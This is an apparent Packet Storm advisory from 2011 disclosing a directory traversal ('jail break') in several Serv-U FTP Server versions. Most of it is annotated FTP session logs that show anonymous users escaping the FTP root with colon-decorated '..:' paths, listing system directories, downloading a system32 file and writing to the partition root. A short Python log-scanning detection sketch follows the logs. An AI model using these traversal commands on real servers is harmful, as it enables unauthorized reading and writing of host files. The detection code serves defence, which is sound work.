Serv-U FTP Server Jail Break

2011-11-30T00:00:00
ID PACKETSTORM:107411
Type packetstorm
Reporter Kingcope
Modified 2011-11-30T00:00:00

Description

                                        
`I'm better than TESO!  
CONFIDENTIAL SOURCE MATERIALS!  
  
[*]----------------------------------------------------[*]  
Serv-U FTP Server Jail Break 0day  
Discovered By Kingcope  
Year 2011  
[*]----------------------------------------------------[*]  
  
Affected:  
220 Serv-U FTP Server v7.3 ready...  
220 Serv-U FTP Server v7.1 ready...  
220 Serv-U FTP Server v6.4 ready...  
220 Serv-U FTP Server v8.2 ready...  
220 Serv-U FTP Server v10.5 ready...  
  
[*]----------------------------------------------------[*]  
C:\Users\kingcope\Desktop>ftp 192.168.133.134  
Verbindung mit 192.168.133.134 wurde hergestellt.  
220 Serv-U FTP Server v6.4 for WinSock ready...  
Benutzer (192.168.133.134:(none)): ftp (anonymous user :>)  
331 User name okay, please send complete E-mail address as password.  
Kennwort:  
230 User logged in, proceed.  
ftp> cd "/..:/..:/..:/..:/program files"  
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files  
ftp> ls -la  
200 PORT Command successful.  
150 Opening ASCII mode data connection for /bin/ls.  
dr--r--r-- 1 user group 0 Nov 12 21:48 .  
dr--r--r-- 1 user group 0 Nov 12 21:48 ..  
drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundatio  
n  
drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications  
drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files  
drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer  
drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources  
d--------- 1 user group 0 Jul 8 16:12 InstallShield  
Installation Information  
drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer  
drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch  
drw-rw-rw- 1 user group 0 Feb 12 2011 Java  
drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting  
drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express  
drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL  
drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com  
drw-rw-rw- 1 user group 0 Feb 12 2011 Sun  
d--------- 1 user group 0 Jul 29 15:13 Uninstall Information  
drw-rw-rw- 1 user group 0 Feb 5 2011 VMware  
drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR  
drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player  
drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT  
d--------- 1 user group 0 Feb 5 2011 WindowsUpdate  
226 Transfer complete.  
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s  
ftp>  
[*]----------------------------------------------------[*]  
with write perms:  
ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition  
[*]----------------------------------------------------[*]  
and as anonymous ftp:  
ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes  
200 PORT Command successful.  
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).  
226 Transfer complete.  
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s  
[*]----------------------------------------------------[*]  
  
This works too!!! :  
  
220 Serv-U FTP Server v7.3 ready...  
Benutzer (xx.xx.xx.xx:(none)): ftp  
331 User name okay, please send complete E-mail address as password.  
Kennwort:  
230 User logged in, proceed.  
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"  
200 PORT Command successful.  
150 Opening ASCII mode data connection for /bin/ls.  
.  
..  
AUTOEXEC.BAT  
boot.ini  
bootfont.bin  
bsmain_runtime.log  
CONFIG.SYS  
Documents and Settings  
FPSE_search  
Inetpub  
IO.SYS  
log  
MSDOS.SYS  
msizap.exe  
MSOCache  
mysql  
NTDETECT.COM  
ntldr  
Program Files  
RavBin  
RECYCLER  
Replay.log  
rising.ini  
System Volume Information  
TDDOWNLOAD  
WCH.CN  
WINDOWS  
wmpub  
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.  
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s  
  
[*]----------------------------------------------------[*]  
Sometimes you need to give it the path:  
  
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"  
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"  
200 PORT Command successful.  
150 Opening ASCII mode data connection for /bin/ls.  
.  
..  
360  
Adobe  
ASP.NET  
CCProxy  
CE Remote Tools  
cmak  
Common Files  
ComPlus Applications  
D-Tools  
FFTPServer  
HTML Help Workshop  
IISServer  
InstallShield Installation Information  
Intel  
Internet Explorer  
Java  
JavaSoft  
K-Lite Codec Pack  
Microsoft ActiveSync  
Microsoft Analysis Services  
Microsoft Device Emulator  
Microsoft MapPoint Web Service Samples  
Microsoft MapPoint Web Service SDK, Version 4.0  
Microsoft Office  
Microsoft Office Servers  
Microsoft Silverlight  
Microsoft SQL Server  
Microsoft Visual SourceSafe  
Microsoft Visual Studio 8  
Microsoft.NET  
MSBuild  
MSXML 6.0  
NetMeeting  
Outlook Express  
PortMap1.61  
Reference Assemblies  
Rising  
SQLXML 4.0  
SQLyog Enterprise  
STS2Setup_2052  
Symantec  
Thunder Network  
TSingVision  
Uninstall Information  
Windows Media Player  
Windows NT  
WindowsUpdate  
WinRAR  
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.  
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s  
ftp>  
`
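
Detection sketch for the requests shown in the sessions above, added here as an example and not part of the original advisory: it scans FTP command logs for path segments that are not a plain `..` but collapse to `..` once colons are removed (`..:` and `:..`). The log layout, `PATH_COMMANDS`, `decorated_dotdot` and `scan` are assumptions for illustration, not Serv-U's log format or API.

```python
import re

# Commands whose argument is a path (RFC 959 and common extensions).
PATH_COMMANDS = {"CWD", "LIST", "NLST", "RETR", "STOR", "APPE", "DELE",
                 "MKD", "RMD", "RNFR", "RNTO", "SIZE", "MDTM"}

def decorated_dotdot(arg):
    """Return segments that are not a plain '..' but collapse to '..'
    once colons are removed, e.g. '..:' and ':..'."""
    segments = re.split(r"[\\/\s]+", arg.strip('"'))
    return [s for s in segments if s != ".." and s.replace(":", "") == ".."]

def scan(log_lines):
    """Return (client, user, command, hits) for each path command whose
    argument contains a decorated parent-directory segment."""
    findings = []
    for line in log_lines:
        fields = line.split(None, 5)  # date time client user command argument
        if len(fields) < 6 or fields[4].upper() not in PATH_COMMANDS:
            continue
        hits = decorated_dotdot(fields[5])
        if hits:
            findings.append((fields[2], fields[3], fields[4].upper(), hits))
    return findings

# Constructed sample log; the layout is an assumption, not Serv-U's format.
SAMPLE_LOG = [
    "2011-11-30 10:00:01 192.0.2.10 anonymous CWD /pub/incoming",
    "2011-11-30 10:00:05 192.0.2.10 anonymous CWD ..",
    "2011-11-30 10:02:11 198.51.100.7 anonymous CWD /..:/..:/..:/..:/program files",
    r"2011-11-30 10:02:40 198.51.100.7 anonymous NLST -a ..:\:..\..:\..:\*",
    "2011-11-30 10:03:02 198.51.100.7 anonymous RETR ..:/..:/..:/..:/windows/system32/calc.exe",
    "2011-11-30 10:04:00 192.0.2.10 anonymous NOOP",
]

if __name__ == "__main__":
    for client, user, command, hits in scan(SAMPLE_LOG):
        print(f"{client} {user} {command}: {len(hits)} decorated '..' "
              f"segment(s) {sorted(set(hits))}")
```

A plain `..` is left alone because it is ordinary client behaviour; only the colon-decorated forms from the sessions above are reported.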